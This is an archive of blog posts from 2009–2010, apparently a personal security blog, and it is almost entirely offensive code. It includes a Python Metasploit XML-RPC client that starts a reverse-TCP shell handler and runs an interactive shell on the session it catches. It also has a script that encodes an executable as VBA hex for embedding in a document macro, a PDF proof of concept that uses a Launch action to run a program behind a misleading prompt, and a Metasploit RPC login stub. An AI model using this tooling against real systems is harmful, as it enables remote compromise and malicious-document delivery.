Wednesday, June 16, 2010

python metasploit xmlrpc interface 1.0


#!/usr/bin/python

import xmlrpclib
class MSFTransport(xmlrpclib.Transport):
"""Handles an transaction to the MetasploitXML-RPC server."""

# client identifier (may be overridden)
def __init__(self, use_datetime=0):
self._use_datetime = use_datetime
def request(self, host, handler, request_body, verbose=0):
# issue XML-RPC request
c = self.make_connection(host)
if verbose:
h.set_debuglevel(1)
self.send_content(c, request_body)
self.verbose = verbose
return self._parse_response(None, c)

def make_connection(self, host):
import socket
addr = host.split(":")
inetaddr = (addr[0],int(addr[1]))
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(inetaddr)
return c
def send_content(self, connection, request_body):
if request_body:
connection.send(request_body + "\0")
def _parse_response(self, file, sock):
# read response from input file/socket, and parse it
p, u = self.getparser()
while 1:
if sock:
response = sock.recv(1024)
else:
response = file.read(1024)
if not response:
break
if response.endswith("\0") :
response = response.rstrip("\0\n")
p.feed(response.encode("utf-8"))
break;
else:
p.feed(response.encode("utf-8"))

if file:
file.close()
p.close()

return u.close()
################################
from time import sleep
import base64
import xmlrpclib
#import MSFTransport
msftransport = MSFTransport()
proxy = xmlrpclib.ServerProxy("http://127.0.0.1:55553", transport=msftransport)

ret = proxy.auth.login("msf","test")
if ret['result'] == 'success':
token = ret['token']
else:
print "Could not login\n"

opts = {
"RHOST" : "192.168.1.1",
"LHOST" : "127.0.0.1",
"LPORT" : 4444,
"PAYLOAD": "windows/shell_reverse_tcp"}
print "Running exploit now"
ret = proxy.module.execute(token,"exploit","multi/handler",opts)
if(ret['result'] == 'success'):
print "Exploit sucessful...waiting on session"
sleep(25)
session_list = proxy.session.list(token)
x = session_list.keys()

def s_io(s):
while 1:
w = raw_input("shell> ")
if w == "exit":
break
write = w + "\n"
n = proxy.session.shell_write(token,s,base64.b64encode(write))
read = proxy.session.shell_read(token,s)
print base64.b64decode(read['data'])

if session_list != {} and session_list[x[0]]['type'] == 'shell':
s = int(x[0])
s_io(s)

Friday, April 30, 2010

exe2vba.py

import struct
import os
import binascii
import win32com.client
import time

idx = 0
n = 0
maxbytes = 2000
payload_vba_file = "payload.vba"

exe_name = "putty.exe"
size = os.path.getsize(exe_name)
exe = open(exe_name)
final_bytes = ""
print "Writing Document ",
while (idx < size):
exe.seek(idx)
c = binascii.b2a_hex(exe.read(1))
# print ("&H%2s" % c.upper()),
exe_byte = ("&H%2s" % c.upper())
final_bytes = final_bytes +exe_byte
idx = idx + 1
if (idx%2000 == 0):
print "\bX\b",
time.sleep(.1)
if (idx%2000 == 1000):
print "\bO\b",
time.sleep(.1)
print final_bytes
fh = open(payload_vba_file,'w')
fh.write(final_bytes)
fh.close()

Wednesday, March 31, 2010

PDF execute code w/o javascript

example code from http://blog.didierstevens.com/2010/03/29/escape-from-pdf/

%PDF-1.1

1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj

2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj

3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj

4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
/Font << /F1 7 0 R >>
>>
>>
endobj

5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj

8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (calc.exe)
/P (\nTo continue viewing the encrypted content\nplease click the “Don’t show this message again” box\nand press OK!)
>>
>>
endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
/Size 9
/Root 1 0 R
>>
startxref
751
%%EOF

Friday, December 04, 2009

metasploit xmlrpc stub

# xmlrpc interface to metasploit

import xmlrpclib
import socket
import telnetlib
from xml.dom import minidom

tn = telnetlib.Telnet("127.0.0.1",55553)
s = tn.get_socket()

params = ( 'msf', 'test' )
tuple_params = tuple([params])

xmlrpccall = xmlrpclib.dumps(params, 'auth.login',None,'UTF-8')
i = xmlrpccall.replace('\n','')

tn.write(i+"\n\0")
data = s.recv(2048)

data = data.replace('\n\0','')
#print data
n = minidom.parseString(data)


print n.toxml()
print n.childNodes[0].toxml()
print n.childNodes[0].childNodes[0].childNodes[0].childNodes[0].childNodes[0].childNodes[1].childNodes[1].childNodes[0].firstChild.data